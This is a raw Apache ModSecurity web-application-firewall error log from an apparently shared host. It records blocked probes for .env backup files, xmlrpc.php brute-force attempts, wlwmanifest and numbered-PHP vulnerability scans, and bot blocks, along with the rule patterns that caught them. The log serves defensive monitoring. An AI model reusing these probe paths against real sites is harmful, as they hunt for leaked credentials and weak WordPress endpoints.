[Tue May 26 18:20:38.471494 2026] [security2:error] [pid 983082:tid 983286] [client 207.241.173.124:63804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local.bak"] [unique_id "ahWXHrvhpIlZJOtze4tGigAAAM8"]
[Tue May 26 18:20:38.472903 2026] [security2:error] [pid 983082:tid 983326] [client 207.241.173.124:63858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.local.orig"] [unique_id "ahWXHrvhpIlZJOtze4tGkAAAAPc"]
[Tue May 26 18:20:38.473042 2026] [security2:error] [pid 983082:tid 983248] [client 207.241.173.124:63792] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "autodiscover.osmsi.org.in"] [uri "/.env.orig"] [unique_id "ahWXHrvhpIlZJOtze4tGgAAAAKk"]
[Tue May 26 18:20:38.533088 2026] [security2:error] [pid 983082:tid 983254] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXHbvhpIlZJOtze4tGBAAAAK8"]
[Tue May 26 18:20:40.932994 2026] [security2:error] [pid 983082:tid 983293] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXH7vhpIlZJOtze4tGuQAAANY"]
[Tue May 26 18:20:42.221035 2026] [security2:error] [pid 983082:tid 983329] [client 34.56.68.96:54812] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "ivwellnessresources.org"] [uri "/index.php"] [unique_id "ahWXILvhpIlZJOtze4tG1gAAAPo"]
[Tue May 26 18:20:42.640399 2026] [security2:error] [pid 983082:tid 983233] [client 107.152.46.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXIrvhpIlZJOtze4tG_AAAAJo"], referer: https://www.anujtradingco.com/
[Tue May 26 18:20:43.071311 2026] [security2:error] [pid 983082:tid 983270] [client 107.152.46.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWXIrvhpIlZJOtze4tHCgAAAL8"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1513828&moderation-hash=47ae9bfb9d731f25707ce5a2fe16d208
[Tue May 26 18:20:43.210790 2026] [security2:error] [pid 983082:tid 983286] [client 193.37.33.134:39495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahWXIrvhpIlZJOtze4tHAQAAAM8"]
[Tue May 26 18:20:43.703805 2026] [security2:error] [pid 983082:tid 983295] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXIrvhpIlZJOtze4tG9gAAANg"]
[Tue May 26 18:20:43.896406 2026] [security2:error] [pid 983082:tid 983213] [client 34.56.68.96:54812] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXI7vhpIlZJOtze4tHHQAAAIY"]
[Tue May 26 18:20:44.411374 2026] [security2:error] [pid 983082:tid 983304] [client 34.56.68.96:54488] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJLvhpIlZJOtze4tHJQAAAOE"]
[Tue May 26 18:20:44.925204 2026] [security2:error] [pid 983082:tid 983200] [remote 103.11.102.106:51932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXJLvhpIlZJOtze4tHMAAA4nU"]
[Tue May 26 18:20:44.930192 2026] [security2:error] [pid 983082:tid 983272] [client 34.56.68.96:56702] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJLvhpIlZJOtze4tHMQAAAME"]
[Tue May 26 18:20:45.412849 2026] [security2:error] [pid 983082:tid 983274] [client 34.56.68.96:58512] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJbvhpIlZJOtze4tHNwAAAMM"]
[Tue May 26 18:20:45.840000 2026] [security2:error] [pid 983082:tid 983311] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXJLvhpIlZJOtze4tHKwAAAOg"]
[Tue May 26 18:20:45.927800 2026] [security2:error] [pid 983082:tid 983335] [client 34.56.68.96:58699] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJbvhpIlZJOtze4tHQwAAAQA"]
[Tue May 26 18:20:46.363538 2026] [security2:error] [pid 983082:tid 983249] [client 34.56.68.96:57224] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJrvhpIlZJOtze4tHTgAAAKo"]
[Tue May 26 18:20:46.828752 2026] [security2:error] [pid 983082:tid 983282] [client 34.56.68.96:57874] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJrvhpIlZJOtze4tHWAAAAMs"]
[Tue May 26 18:20:47.238749 2026] [security2:error] [pid 983082:tid 983337] [client 34.56.68.96:54205] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJ7vhpIlZJOtze4tHawAAAQI"]
[Tue May 26 18:20:47.650398 2026] [security2:error] [pid 983082:tid 983314] [client 34.56.68.96:58742] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXJ7vhpIlZJOtze4tHdwAAAOs"]
[Tue May 26 18:20:48.225991 2026] [security2:error] [pid 983082:tid 983254] [client 34.56.68.96:54890] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXKLvhpIlZJOtze4tHgQAAAK8"]
[Tue May 26 18:20:48.705816 2026] [security2:error] [pid 983082:tid 983282] [client 34.56.68.96:59354] ModSecurity: Warning. Operator GE matched 2 at IP:dos_burst_counter. [file "/etc/httpd/modsecurity.d/03_asl_dos.conf"] [line "99"] [id "350114"] [rev "1"] [msg "Atomicorp.com WAF Rules: Potential Denial of Service (DoS) Attack from  - # of Request Bursts: 2"] [severity "ERROR"] [tag "no_ar"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXKLvhpIlZJOtze4tHjgAAAMs"]
[Tue May 26 18:20:48.705870 2026] [security2:error] [pid 983082:tid 983282] [client 34.56.68.96:59354] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXKLvhpIlZJOtze4tHjgAAAMs"]
[Tue May 26 18:20:48.708580 2026] [security2:error] [pid 983082:tid 983251] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXJ7vhpIlZJOtze4tHcgAAAKw"]
[Tue May 26 18:20:48.829849 2026] [security2:error] [pid 983082:tid 983091] [remote 94.76.235.103:46696] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWXKLvhpIlZJOtze4tHjAAA-Ag"]
[Tue May 26 18:20:49.120582 2026] [security2:error] [pid 983082:tid 983273] [client 34.56.68.96:59507] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXKbvhpIlZJOtze4tHlQAAAMI"]
[Tue May 26 18:20:49.120724 2026] [security2:error] [pid 983082:tid 983273] [client 34.56.68.96:59507] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahWXKbvhpIlZJOtze4tHlQAAAMI"]
[Tue May 26 18:20:51.984727 2026] [security2:error] [pid 983082:tid 983273] [client 137.184.130.181:62355] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blog.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWXK7vhpIlZJOtze4tH0wAAAMI"]
[Tue May 26 18:20:52.070465 2026] [security2:error] [pid 983082:tid 983224] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXKrvhpIlZJOtze4tHuQAAAJE"]
[Tue May 26 18:20:52.475583 2026] [security2:error] [pid 983082:tid 983291] [client 69.139.111.219:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXKrvhpIlZJOtze4tHwAAAANQ"]
[Tue May 26 18:20:54.008957 2026] [security2:error] [pid 983082:tid 983225] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXLLvhpIlZJOtze4tH3gAAAJI"]
[Tue May 26 18:20:54.448822 2026] [security2:error] [pid 983082:tid 983119] [remote 51.68.247.201:46624] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "lagoslawntennisclub1895.com"] [uri "/robots.txt"] [unique_id "ahWXLrvhpIlZJOtze4tIAgAApSQ"]
[Tue May 26 18:20:54.448977 2026] [security2:error] [pid 983082:tid 983244] [client 51.68.247.201:46624] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lagoslawntennisclub1895.com"] [uri "/robots.txt"] [unique_id "ahWXLrvhpIlZJOtze4tIAgAApSQ"]
[Tue May 26 18:20:55.022682 2026] [proxy:error] [pid 983082:tid 983126] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:20:55.022739 2026] [proxy_http:error] [pid 983082:tid 983126] [remote 147.185.132.252:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:20:55.023344 2026] [proxy:error] [pid 983082:tid 983126] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:20:55.023388 2026] [proxy_http:error] [pid 983082:tid 983126] [remote 147.185.132.252:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:20:55.785486 2026] [security2:error] [pid 983082:tid 983215] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXLrvhpIlZJOtze4tIBQAAAIg"]
[Tue May 26 18:20:56.450529 2026] [security2:error] [pid 983082:tid 983136] [remote 51.222.168.172:21158] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "lagoslawntennisclub1895.com"] [uri "/"] [unique_id "ahWXMLvhpIlZJOtze4tIKgAAjTU"]
[Tue May 26 18:20:56.450750 2026] [security2:error] [pid 983082:tid 983220] [client 51.222.168.172:21158] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lagoslawntennisclub1895.com"] [uri "/"] [unique_id "ahWXMLvhpIlZJOtze4tIKgAAjTU"]
[Tue May 26 18:20:56.887201 2026] [security2:error] [pid 983082:tid 983301] [client 103.48.182.138:9435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.182.48.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/xmlrpc.php"] [unique_id "ahWXMLvhpIlZJOtze4tIKQAAAN4"]
[Tue May 26 18:20:56.887400 2026] [security2:error] [pid 983082:tid 983301] [client 103.48.182.138:9435] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "rainadelproperties.com"] [uri "/xmlrpc.php"] [unique_id "ahWXMLvhpIlZJOtze4tIKQAAAN4"]
[Tue May 26 18:20:57.407468 2026] [security2:error] [pid 983082:tid 983255] [client 188.166.247.214:51232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.247.166.188.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/xmlrpc.php"] [unique_id "ahWXMbvhpIlZJOtze4tIOQAAALA"]
[Tue May 26 18:20:57.653393 2026] [security2:error] [pid 983082:tid 983329] [client 85.208.96.207:34588] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWXMbvhpIlZJOtze4tIQwAAAPo"]
[Tue May 26 18:20:57.653561 2026] [security2:error] [pid 983082:tid 983329] [client 85.208.96.207:34588] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWXMbvhpIlZJOtze4tIQwAAAPo"]
[Tue May 26 18:20:58.704131 2026] [security2:error] [pid 983082:tid 983227] [client 188.166.247.214:53655] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWXMrvhpIlZJOtze4tIWgAAAJQ"]
[Tue May 26 18:20:58.982620 2026] [security2:error] [pid 983082:tid 983226] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXMbvhpIlZJOtze4tIRgAAAJM"]
[Tue May 26 18:21:00.238470 2026] [security2:error] [pid 983082:tid 983326] [client 188.166.247.214:54579] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWXNLvhpIlZJOtze4tIewAAAPc"]
[Tue May 26 18:21:01.310928 2026] [security2:error] [pid 983082:tid 983309] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXNLvhpIlZJOtze4tIeQAAAOY"]
[Tue May 26 18:21:01.606894 2026] [security2:error] [pid 983082:tid 983313] [client 188.166.247.214:55610] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWXNbvhpIlZJOtze4tIkwAAAOo"]
[Tue May 26 18:21:02.901564 2026] [security2:error] [pid 983082:tid 983337] [client 188.166.247.214:56339] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahWXNrvhpIlZJOtze4tItgAAAQI"]
[Tue May 26 18:21:04.044108 2026] [security2:error] [pid 983082:tid 983298] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXNrvhpIlZJOtze4tIsgAAANs"]
[Tue May 26 18:21:04.258030 2026] [security2:error] [pid 983082:tid 983309] [client 188.166.247.214:56922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWXOLvhpIlZJOtze4tIyQAAAOY"]
[Tue May 26 18:21:05.644557 2026] [security2:error] [pid 983082:tid 983232] [client 188.166.247.214:57445] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahWXObvhpIlZJOtze4tI7QAAAJk"]
[Tue May 26 18:21:06.267018 2026] [security2:error] [pid 983082:tid 983244] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXObvhpIlZJOtze4tI3gAAAKU"]
[Tue May 26 18:21:07.637002 2026] [security2:error] [pid 983082:tid 983304] [client 188.166.247.214:58304] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWXO7vhpIlZJOtze4tJEAAAAOE"]
[Tue May 26 18:21:08.640920 2026] [security2:error] [pid 983082:tid 983143] [remote 74.208.170.33:51142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.170.208.74.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWXPLvhpIlZJOtze4tJHQAAjDw"]
[Tue May 26 18:21:08.785040 2026] [security2:error] [pid 983082:tid 983314] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXO7vhpIlZJOtze4tJCgAAAOs"]
[Tue May 26 18:21:09.264612 2026] [security2:error] [pid 983082:tid 983225] [client 188.166.247.214:59838] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWXPbvhpIlZJOtze4tJKAAAAJI"]
[Tue May 26 18:21:09.591804 2026] [security2:error] [pid 983082:tid 983326] [client 23.100.97.57:3036] ModSecurity: Warning. Pattern match "/1\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1543"] [id "900921"] [msg "temporary TUW-72162 logging rule"] [hostname "autodiscover.whitesun.in"] [uri "/1.php"] [unique_id "ahWXPbvhpIlZJOtze4tJLwAAAPc"]
[Tue May 26 18:21:09.662776 2026] [security2:error] [pid 983082:tid 983326] [client 23.100.97.57:3036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/1.php"] [unique_id "ahWXPbvhpIlZJOtze4tJLwAAAPc"]
[Tue May 26 18:21:10.210187 2026] [security2:error] [pid 983082:tid 983338] [client 23.100.97.57:3771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/2.php"] [unique_id "ahWXPrvhpIlZJOtze4tJPwAAAQM"]
[Tue May 26 18:21:10.680818 2026] [security2:error] [pid 983082:tid 983275] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWXPbvhpIlZJOtze4tJMgAAAMQ"]
[Tue May 26 18:21:10.773573 2026] [security2:error] [pid 983082:tid 983280] [client 23.100.97.57:9580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.97.100.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.whitesun.in"] [uri "/7.php"] [unique_id "ahWXPrvhpIlZJOtze4tJSQAAAMk"]
[Tue May 26 18:21:10.924088 2026] [security2:error] [pid 983082:tid 983245] [client 188.166.247.214:60840] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "koiralalogistics.com.onesoft.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWXPrvhpIlZJOtze4tJSwAAAKY"]
